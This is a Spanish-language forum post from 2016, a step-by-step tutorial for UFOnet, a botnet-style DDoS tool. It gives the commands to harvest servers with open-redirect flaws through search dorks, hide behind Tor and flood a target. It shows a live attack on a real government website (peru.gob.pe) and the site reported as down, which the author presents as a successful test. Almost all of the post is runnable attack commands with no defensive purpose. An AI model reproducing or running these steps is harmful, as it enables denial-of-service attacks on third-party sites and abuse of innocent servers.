Underc0de

[In]Seguridad Informática => Seguridad web y en servidores => Mensaje iniciado por: BrowserNet en Mayo 21, 2016, 09:42:06 PM

Título: Enviando ataques masivos de DDoS con UFOnet
Publicado por: BrowserNet en Mayo 21, 2016, 09:42:06 PM
(http://3.bp.blogspot.com/-7Izij6RMu2M/VlJGnT82qNI/AAAAAAAADDc/ECo0Hk_w08w/s1600/ufonet-logo.png)

Saludos hermanos de underc0de en esta oportunidad les traigo la herramienta llamada "UFOnet" la cual funciona como una "Botnet" de distribución de denegación de servicio, en nuestro sistema operativo GNU/Linux recolectando fallos de servidores web con la vulnerabilidad "Open Redirect" la cual enviara varias peticiones con grandes paquetes a la pagina objetivo.

http://cwe.mitre.org/data/definitions/601.html

(http://1.bp.blogspot.com/-runnekOtZB0/VlULtSfQpfI/AAAAAAAADEg/xxsT8MGLOVQ/s1600/1.png)

Descarga

root@kali:~# git clone https://github.com/epsylon/ufonet
root@kali:~# cd ufonet
root@kali:~/ufonet# ls
root@kali:~/ufonet# cd ufonet
root@kali:~# ./ufonet


(http://2.bp.blogspot.com/-O1JHrUzZYW8/VlUM8ulyyLI/AAAAAAAADE0/II1MAa3LfPU/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B11%255E%252507%255E%252521.png)

una ves descargado y comprobado que todo salio exitoso, vamos a configurar nuestro servidor añadiendo algunas configuraciones pero antes vamos a explicar algunos métodos que consta dicha herramienta.

Busqueda de Boots

Como sabrán esta herramienta consta de una búsqueda de indexiaciones por medio de "Dorks" donde vamos a encontrar parámetros GET  que son vulnerables para realizar este tipo de ataques como son:

    'check.cgi?url='
    'proxy.php?url='
    'validator?uri='
    'checklink?uri='

al realizar dichas consultas vamos a encontrarnos que el buscador por default es "duck", pero también podemos añadir otros parámetros para añadir otros buscadores como lo son bing, google, yahoo, yandex, etc, como son las siguientes:


root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'


pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:

root@kali:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'

(http://4.bp.blogspot.com/-icNB6_XH-7c/VlUUIfNsnzI/AAAAAAAADFE/URK3wSky9o4/s640/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B11%255E%252540%255E%252550.png)

como pueden observar esta elaborando una búsqueda general de todas las Dorks encontradas en dicho documento de texto, donde rápidamente se guardara en un archivo llamado "Zombies.txt".

Pero si deseamos tener una conexión anónima en este caso con un proxy que sea directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.

./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"

Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurarlo para Kali.

http://backtrack-omar.blogspot.pe/2015/09/instalar-tor-browser-en-kali-linux-20-y.html

Bueno primero que nada, vamos a  ejecutar algunas conexiones default de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:

(http://4.bp.blogspot.com/-n06q7K8jN4k/VlVNA3fsazI/AAAAAAAADFc/RGanYQcHnOY/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B11%255E%252518%255E%252513.png)

root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url='


luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables


root@kali:~/ufonet/ufonet# ./ufonet -i http://target.com


(http://3.bp.blogspot.com/--z3HYHNIBds/VlVMmvjwTbI/AAAAAAAADFU/4H1s86vEe7U/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B15%255E%252525%255E%252517.png)

como vemos los archivos están siendo cargados de manera exitosa en nuestro servidor local, pero también podemos ejecutar  el siguiente comando para elaborar un TEST en el siguiente servicio.

root@kali:~/ufonet/ufonet#  ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"


(http://1.bp.blogspot.com/-4rcG_400Szc/VlVOTHRZBfI/AAAAAAAADFo/zdJElDvQVSU/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B15%255E%252539%255E%252556.png)

sin duda este ataque es muy efectivo ya que va realizar consultas con las listas mas grandes que puede ver en el servidor y es uno de los mas efectivos, pero también podemos ejecutar el siguiente que es aun mas prodigioso si es que se ha configurado bien el buscador de webs vulnerables, si deseamos lanzar un ataque mediante las conexiones de envíos por default podemos añadir lo siguiente:

root@kali:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v

(http://1.bp.blogspot.com/-46XDMpE8Ygc/VlVQqI9qozI/AAAAAAAADF0/GxMFsM_o8YM/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B15%255E%252552%255E%252557.png)

como vemos primero nos carga los paquetes de envíos de las cabeceras, como acabamos de ver, pero al terminar lo siguiente, empezaremos a enviar las peticiones de acuerdo al tipo de threads que hemos realizado, como en mi caso fue 10, se ara una petición de 10 repeticiones:

(http://4.bp.blogspot.com/-4EmCGSuCRq0/VlVQq0PHbTI/AAAAAAAADF8/dUzlEEa1qVU/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B15%255E%252554%255E%252509.png)

como vemos en la siguiente imagen la herramienta consta de una website muy conocida llamada "downforeveryoneorjustme", donde nos dirá, si la web esta Down o UP como vemos nos dice que esta down o caída.

(http://3.bp.blogspot.com/-nRW1dXn-AlE/VlVQq3HQbFI/AAAAAAAADGA/6IK3NeHn5s0/s1600/Captura%2Bde%2Bpantalla%2Bde%2B2015-11-21%2B16%255E%252503%255E%252514.png)

pero como siempre es bueno echar ojo en los servicios paso a verificarlo:

(http://2.bp.blogspot.com/-pHIoeVNWt04/VlVR8NIdiLI/AAAAAAAADGU/nnT3R7AKxJs/s1600/1.png)
(http://2.bp.blogspot.com/-Bgh-rdZe2-A/VlVR8MY1q5I/AAAAAAAADGQ/rRzpyhql_TI/s1600/2.png)

Lo interesante son los paquetes que envía y la respuesta que recibe.

(http://3.bp.blogspot.com/-Z_TTSKxBMLg/VlVT1SUq4cI/AAAAAAAADGk/RbwLzi5E5fY/s1600/1.png)

entonces el Test del servidor se ha realizado correctamente. espero les haya gustado este POST.

Saludos!